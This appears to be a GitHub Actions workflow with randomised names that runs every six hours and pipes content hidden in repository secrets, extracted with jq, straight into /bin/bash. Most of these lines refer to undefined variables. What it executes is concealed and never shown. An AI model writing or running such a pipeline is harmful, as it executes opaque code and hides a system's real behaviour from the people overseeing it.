name: liaojiexcv

on:
  workflow_dispatch:
  schedule:
    - cron: '12 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liaojiexcv
        env:
          wm8: ${{ secrets.wm8 }}
        run: |
          echo $wm8 | jq -r .amz866 | /bin/bash
          echo $vemz08 | jq -r .i332 | /bin/bash
          echo $ibw0799 | jq -r .v45700 | /bin/bash
          echo $ka27 | jq -r .f1709 | /bin/bash
          echo $hgs674 | jq -r .bfz03435 | /bin/bash
          echo $sl66071 | jq -r .q40 | /bin/bash
          echo $kfolb70 | jq -r .qjhc707 | /bin/bash

